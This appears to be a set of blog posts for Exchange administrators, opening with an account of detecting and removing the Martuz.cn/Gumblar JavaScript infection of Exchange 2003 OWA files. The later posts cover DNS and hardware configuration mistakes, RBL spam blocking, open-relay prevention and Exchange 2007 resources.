Martuz.cn / Gumblar exploit causing Microsoft Exchange 2003 OWA to run extremely slow after login and how to fix this problem.
Martuz.cn / Gumblar Exploit root cause of the OWA problem
Symptoms of Microsoft Exchange 2003 Outlook Web Access and martuz.cn JavaScript virus infection
Within the last few days one of our main Exchange 2003 Server Outlook Web Access became painfully slow. Symptoms were related to main browser window in Internet Explorer displaying just the vertical bar that separates the folders and the message area and getting stuck there for about 30 seconds and then finally loading the rest of the page. Double clicking and opening a message would pop open the blank message window with a http://your servername…. In the lower left hand status bar of the pop up window and finally after about 30 seconds would load the window. Same thing would happen composing a new mail message in OWA. Everything worked normally accept that tasks became slower for users in OWA.
Martuz.cn JavaScript virus infection detection
We are running the latest version of Symantec Norton Endpoint Security which did not report any virus, Trojans, or spywares on the Exchange 2003 server. Looking further into the situation we noticed that when the browser window for the Outlook Web Access opened the task bar of the browser window would display http://yourservername…. and then would change to http://martuz.cn/vid/… for a few seconds and OWA window would finally open. This indicated some infection. Our analyses showed that OWA was running an infected java script within the OWA pages that caused the problem to appear. Apparently Symantec End Point Security on had no clue about this infection and we are still unsure about how server got infected. Googling and doing the research we have seen reports of PHP exploit or FTP exploit for the cause of the infection of the virus.
Martuz.cn JavaScript virus infection removal
First of all to see if you have the same problem as described here by logging into to the OWA account and watch at message on the bottom left side of the task bar of the browser window after the login which would say “Waiting for http://yourservername/exchange” if at any time it changes to waiting for http://martuz.cn… And then disappears you have the same problem.
Download and install the Microsoft Forefront Client Security trial version and install on the server, we left Symantec End Point Security running at the same time without any problem. Scan your entire Exchange installation folder only on your server for a quick check. If you see the message related to Gumblar Trojan then you server is infected. Infected files will be in \Exchsrvr\exchweb\controls and or D:\Exchsrvr\exchweb\6.5.7651.60 or something similar. Backup the entire exchweb folder just in case. Chose the option to remove the virus infected file. Re-install Exchange 2003 Service Pack which would re-populate the files removed by the anti-virus software.
Summary:
Martuz.cn / Gumblar is a JavaScript exploit that inserts itself into the legitimate OWA files. There is no definite known cause of how this virus gets installed on the server. Microsoft Forefront Security client seems to do a good job of detecting and removing the virus. You need to re-install service pack in order to re-introduce the files removed during the virus removal.
Common Mail Server Configuration Mistakes
1. Installation on Unsupported Hardware
Unless there is a very good reason not to, always install Exchange on hardware supported by Microsoft. Consult Microsoft’s Windows Server Catalog (formerly the “Hardware Compatibility List,” or HCL) for a complete list of compatible, supported hardware. In order for a system to be considered supported, it must be listed in the Windows Server Catalog. Systems containing some supported and some unsuported software are considered unsupported by Microsoft. In addition to ensuring a smoother installation or upgrade, using supported hardware also means you will receive better technical support from Microsoft or other vendors should the need arise in the future. Using unsupported hardware can cause problems ranging from intermittent mail outages to total and complete loss of data.
- Exchange Server 2008 requires both 64-bit hardware and 64-bit Windows. See “Exchange 2007: Frequently Asked Questions” for more information.
- Exchange Server 2003 cannot run on 64-bit Windows. See “Choosing Exchange Server 2003 Hardware for Reuse with Exchange Server 2007“ for recommendations from Microsoft on choosing the best hardware for Exchange.
- See “Microsoft support policy on hardware not in the Windows Catalog (Windows HCL)” (KB142865) for more information on Microsoft position on unsupported hardware.
2. Misconfigured DNS
Because Exchange relies heavily on both Active Directory and DNS, a simple configuration problem in either one will cause major headaches for your new or upgraded Exchange environment. Here are a few of the common configuration mistakes when it comes to DNS and your Exchange environment:
- All Windows 2000 Servers must be on Service Pack 3 or Windows Server 2003, including Global Catalogs (GCs). It is also Microsoft’s recommendation that at least one GC be placed in each site containing an Exchange mail server.
- Verify your Mail Exchanger (MX) records are correct and that no MX record points to the Fully Qualified Domain Name (FQDN) of an Exchange server. See “How to Verify that MX Records Do Not Point to the FQDN of an Exchange Server.”
- If it exists, remove the root zone under Forwarded Lookup Zones in the DNS management console, as it will prevent Exchange from sending mail (outbound mail). See “How To Remove the Root Zone (Dot Zone)“ (KB298148) and “‘Host Unknown’ message when sending outbound Internet mail” (KB289045) for information on removing the root (AKA “dot”) zone.
- See “Exchange Server 2003: Verifying DNS Design and Configuration“ for more information on verifying your DNS configuration.
How to use RBL Servers to block Spam for Free on Mail Servers
In this article we will discuss how to use RBL Servers to block Spam for Free on Mail Servers
First, what is a RBL server? A Real-Time Black List (RBL) is a Domain Name Server (DNS) that contains the IP addresses of SMTP servers that either originate spam, or are considered to be spam open relay hosts. One of the most common methods for sending spam, open relays are servers with insufficient security or other loopholes that allow anyone who knows how to tap into them, and use them for mass mailings of anonymous email.
Fortunately, you can find and use one of several RBL service providers to prevent spam getting in your user’s inbox reject from the start all emails that are sent by compromised spam open relay hosts. This is done by checking the sender’s IP / domain against RBLs
How to stop Exchange Server Relay
If you’re a Microsoft Exchange server Admin part of your job is to keep your organization free of SPAM.
Regardless of how much bandwidth your organization may have, there is a finite amount of data that the Internet connection can handle in a given amount of time. This means that if your organization is using their Internet connection at or near its total capacity then any time you receive a junk E-mail message, other legitimate messages are kept waiting until bandwidth becomes available. Additionally, organizations plagued by excessive SPAM, reduces available disk space on an Exchange Server. So as you can see it’s imperative that you effectively combat SAPM.
The Microsoft Exchange Server Internet Mail Service may be configured as a publicly accessible relay mail. In this configuration, the outside users can use the relay Internet Mail Service as an agent for unsolicited commercial e-mail (UCE or SPAM), flooding others with many copies of the same message.
To prevent this from happing, first, make sure that the default SMTP relay settings have been applied to your Exchange 2003 servers per Microsoft’s article on how to configure SMTP relay restrictions. If your Exchange server is still sending SPAM, then you should disable all authentication methods except for “anonymous” on your Internet-facing SMTP host. By default, anonymous authentication, will allow messages to be sent, but not relayed.
If outbound SPAM remains a problem, then the SPAM is coming from one of your internal hosts. You may consider resetting all passwords in your Exchange organization to regain control over the SMTP relaying, or reset the Relay Restrictions tab to “Allow all computers which successfully authenticate to relay, regardless of the list above.”
For more information, read Microsoft’s article, Stop Exchange Server SPAM from the inside by locking down SMTP.
MS Exchange 2007 Mailbox Server Storage Cost Calculator
MSExchangeTeam.com has posted a very useful article about the Microsoft Exchange 2007 Mailbox Server Storage Cost Calculator.
In order to move forward with various designs like large mailboxes, IT departments need to understand one of the chief costs associated with Exchange mailbox servers, namely storage. To that end, the Exchange 2007 Mailbox Storage Cost Calculator is designed to help you determine a portion of the mailbox server cost, namely the disk cost (purchase price and lifecycle power and cooling costs). The calculator helps in two ways:
1. The calculator compares a series of storage design configurations and determines their respective costs. The underlying goal here is two-fold:
a. To show that you can achieve the same capacity and I/O requirements utilizing Small Form Factor SAS disks for relatively the same cost as Large Form Factor FC disks.
b. To show that there are other disk solutions (e.g., SATA) that can be viable and reduce the disk footprint cost.
2. In the situation where you are unsure whether you want to deploy Single Copy Clusters (SCC) or Cluster Continuous Replication (CCR), the calculator can compare SCC+SAN disk configurations against CCR+DAS disk configurations from a cost perspective.
Read the full MS Exchange 2007 Storage Cost Calculator Article
Exchange 2007 Service Pack (SP) 1
Microsoft recently released Exchange 2007 SP1. The Service Pack features improvements in the following areas: Client Access Improvements, Protection & Availability improvements, Transport Improvements, Mailbox Role Improvements, and Unified Messaging Improvements. ExchangeIS provides a detailed writeup of all of Exchange 2007 SP1’s features.
Exchange 2007 Mail Flow (DNS Records, Connectors and TLS)
Elan Shudnow has written a detailed post on how you should configure DNS for Exchange 2007. Here’s the summary of his article:
A lot of people are confused as to how exactly you should configure DNS for Exchange 2007. But this isn’t just limited to DNS, but how do you set up your Send Connectors, Receive Connectors, how both connectors relate to DNS and the SMTP banner, and how to allow your Connectors to advertise TLS to the outside world.
For Elan Shudnow’s complete explanation - which contains detailed screenshots and more, follow this link: Exchange Server 2007 Mail Flow.
MS Exchange Mail Server Troubleshooting Tips: When Email Doesn’t Come in From the Web
This article will describe how an IT Administrator can easily troubleshoot a common problem: when emails don’t come in from the Web. We’ll show you how you can quickly test if the issue is related to your mail server, firewall, or DNS, allowing you to pinpoint the problem and get it fixed right away. Read more »
Common Exchange Server Configuration Mistakes - Open Relay Server Settings
Having an open relay server is a death sentence for your organization. In today’s post, we’re going to make sure that your MS Exchange 2003 server is not configured as an open relay server - a common mistake that unfortunately is all too easy to make.
In this post, we’re going to talk about how to check and avoid making your server an open relay server. We’ll also point out a few tools to make sure your servers aren’t on Real Time Blacklists as a possible result of open relay server configurations. Read more »
